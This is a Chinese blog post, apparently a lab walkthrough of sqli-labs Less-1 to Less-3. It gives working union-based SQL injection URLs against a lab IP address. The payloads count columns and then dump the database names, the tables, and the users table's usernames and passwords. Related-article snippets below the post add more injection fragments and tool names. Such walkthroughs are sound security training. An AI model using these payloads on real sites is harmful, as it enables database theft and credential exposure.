SQL注入

已于 2022-04-09 23:28:41 修改
阅读量5.5k 收藏
点赞数 1
分类专栏: SQL注入 文章标签: c++
于 2022-04-09 22:37:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39763436/article/details/124068879
版权

Less-1

在这里插入图片描述
输入:http://47.108.225.196/Less-1/?id=1
在这里插入图片描述
输入:http://47.108.225.196/Less-1/?id=1’
可以看到报错了,说明存在注入
在这里插入图片描述
输入:http://47.108.225.196/Less-1/?id=1’ order by 1–+
使用order by 语句判断有几列,前面页面回显正常,直到order by 4页面回显不正常,说明这个表有3列【–+在SQL内表示注释】
在这里插入图片描述
在这里插入图片描述
输入:http://47.108.225.196/Less-1/?id=-1’ union select 1,2,3 --+
可以看到2和3这两个位置有输出【union联合注入是将两个sql语句进行联合,当前一个语句选择的内容为空,就能显示后面语句的内容】
在这里插入图片描述
输入:http://47.108.225.196/Less-1/?id=-1’ union select 1,(select group_concat(schema_name) from information_schema.schemata) ,3–+
获取所有数据库名的信息
在这里插入图片描述
输入:http://47.108.225.196/Less-1/?id=-1’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),3 --+
获取security这个数据库中的表名信息
在这里插入图片描述

输入:http://47.108.225.196/Less-1/?id=-1’ union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’),3 --+
获取users这个表的列名信息
在这里插入图片描述
输入:http://47.108.225.196/Less-1/?id=-1’ union select 1,(select group_concat(id,username,password) from security.users),3 --+
获取users表里面的字段内容
在这里插入图片描述

Less-2

输入:http://47.108.225.196/Less-2/?id=1’
判断注入点
在这里插入图片描述
输入:http://47.108.225.196/Less-2/?id=1 order by 3 --+
判断字段数
在这里插入图片描述
输入:http://47.108.225.196/Less-2/?id=-1 union select 1,2,3 --+
判断可显字段
在这里插入图片描述
后面的爆数据库名、数据表名、字段名、字段内容的步骤和less-1一样

Less-3

输入:http://47.108.225.196/Less-3/?id=1’
判断注入点
在这里插入图片描述
输入:http://47.108.225.196/Less-3/?id=1’)–+
构造id=1’)闭合前面的括号和引号,发现没有报错
在这里插入图片描述
输入:http://47.108.225.196/Less-3/?id=1’) order by 3–+
判断字段数
在这里插入图片描述
输入:http://47.108.225.196/Less-3/?id=-1’) union select 1,2,3 --+
判断可显字段
在这里插入图片描述
后面的爆数据库名、数据表名、字段名、字段内容的步骤也和less-1一样

大佬带带我.
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
啊Dsql注入工具
06-08
啊Dsql注入工具: 注入工具只是一个检测注入漏洞的工具,如果网站没有此漏洞将无法注入的!一般检测的网站以 asp 扩展的网站(别的扩展名的也有可能的,只要是有SQL入问题的),至于老试都没有检测到可用的,是因为现在这个漏洞很多网站也已修补了,所以没有也是很正常的,还有想说的就是,当你使用此软件于用破坏的,你也做好网警找你"喝茶"的心理准备!
pangolinsdl—sql注入工具
06-20
**SQL注入工具——PangolinsDL详解** SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意的SQL代码来操纵或获取数据库中的敏感信息。针对这种威胁,开发者和安全研究人员常常使用SQL注入工具来进行测试和...
2019-05-22 SQL注入;啊D注入工具
weixin_30732487的博客
05-22 1779
SQL注入攻击是黑客对数据库进行攻击的常用手 段。随着B/S (Browser/Server.即浏览器和服务器结构) 模式应用开发的发展.使用这种模式编写应用程序的程 序员也越来越多。但是由于程序员的水平及经验也参差 不齐.相当一大部分程序员在编写代码的时候.没有对 用户输入数据的合法性进行判断.使应用程序存在安全 隐患。用户可以提交一段数据库查询代码,根据程序返 回的结果.获...
阿D SQL注入工具常用的一些注入命令
jackljf的专栏
06-06 1391
 //看看是什么权限的 and 1=(Select IS_MEMBER(’db_owner’)) And char(124)%2BCast(IS_MEMBER(’db_owner’) as varchar(1))%2Bchar(124)=1 ;-- //检测是否有读取某数据库的权限 and 1= (Select HAS_DBACCESS(’master’)) And char(124)%2
啊D的使用学习
不忘初心,护天下安全!
12-01 8928
啊D注入工具 是一种主要用于SQL注入工具,由彭岸峰开发,使用了多线程技术,能在极短的时间内扫描注入点 下载 https://download.csdn.net/download/qq_37865996/10821070 使用 1.打开啊D 注意观察左侧的<注入检测>里的<SQL注入检测>、<浏览网页>、<相关工具>选项的功能等,下...
SQL注入***
weixin_34372728的博客
06-12 622
SQL注入***是***对数据库进行***的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injectio...
sql注入详解
最新发布
good good study
05-05 20万+
SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
SQL 注入天书.pdf
08-06
SQL注入是一种常见的网络安全漏洞,发生在应用程序使用用户输入的SQL代码直接构建数据库查询时。当攻击者能够通过输入恶意SQL语句来控制或篡改数据库查询,他们就能获取敏感信息、修改数据甚至完全控制系统。《SQL...
sql注入攻击流量情况
07-18
sql注入攻击流量情况
sql注入网站源码
04-09
SQL注入是一种常见的网络安全漏洞,主要出现在使用动态SQL语句构建数据库查询的应用程序中。这个"sql注入网站源码"提供了一个具有SQL注入漏洞的ASP(Active Server Pages)网站实例,对于学习如何检测、防范和修复这...
啊D SQL注入工具
06-03
啊D注入工具,功能很强大,可以广泛撒网,寻找SQL注入攻击点,还可以精细的扫描猜测后天数据库名、表名、字段名,寻找后台入口等,是一个很好的工具
啊d+批量扫描+网站注入+嗅探.zip
07-06
适合课余学习钻研,啊D注入工具是一款由彭岸峰开发的用于SQL的注入工具,其使用了多线程技术,可帮助用户在极端的时间内扫描注入点,且用户无需经过太多的学习即可熟练的操作它。嗅探_Cain & Abel V4.9,是一个可以crack屏保、PWL密码、共享密码、缓存口令、远程共享口令、SMB口令、支持VNC口令解码、Cisco Type-7口令解码、Base64口令解码
啊D注入工具
04-22
啊D注入工具。供CTF爱好者交流学习使用,切勿用于不法行为。
网络攻防工具
01-18
阿D 端口扫描 SQL注入 挖掘鸡 字典 包含几乎全部常用的系统防,网络扫描,木马免杀工具。你值得拥有。。
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
啊D注入工具是一种主要用于SQL的注入工具
VV13099612171的博客
10-23 1189
准备扫描数据 在搜索引擎中,找到一个完整的URL地址 打开啊D注入工具,选择“注入检测”的“扫描注入点”子项 粘贴刚才的URL地址,回车 此时,等待一会儿,底下的框框会出现一些红色字体的链接,此类链接为可用注入点 双击一条可用注入链接,界面自动跳转到“SQL注入检测” 单击“检测”,若出现“此连接不能SQL注入!请选择别的链接”,则另选一条链接检测。 单击“检测表段”,此项会扫描数据库中有没有可注入的注册表。若没有,则执行步骤5。直到有可注入 ..
『安全工具』注入神器SQLMAP
weixin_33858485的博客
11-27 3827
原文:『安全工具』注入神器SQLMAP          Pic by Baidu 0x 00 前言     正是SQLMAP这种神器的存在,SQL注入简直Easy到根本停不下来....     PS:国内类似软件也有阿D,明小子,挖掘机,当你用过他们之后你才会发现SQLMap才是绝对的注入神器   0x 01 注入原理 *******************************...
metinfo 后台sql注入1
08-03
《MetInfo 后台SQL注入漏洞详解》 MetInfo,一款基于PHP和MySQL构建的内容管理系统,因其功能丰富和易于使用而广受欢迎。然而,随着技术的发展,安全问题也日益凸显。本文将深入探讨MetInfo 6.1.0版本中的一个SQL...
SQL注入攻击技术详解
"SQL注入实战教程,涵盖ACCESS、MySQL、SQL SERVER和ORACLE的注入技巧,由讲师闵海钊讲解,内容包括注入点检测、表名和列名的猜解、长度判断等。" SQL注入是一种常见的网络安全攻击手段,攻击者通过在Web应用的输入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值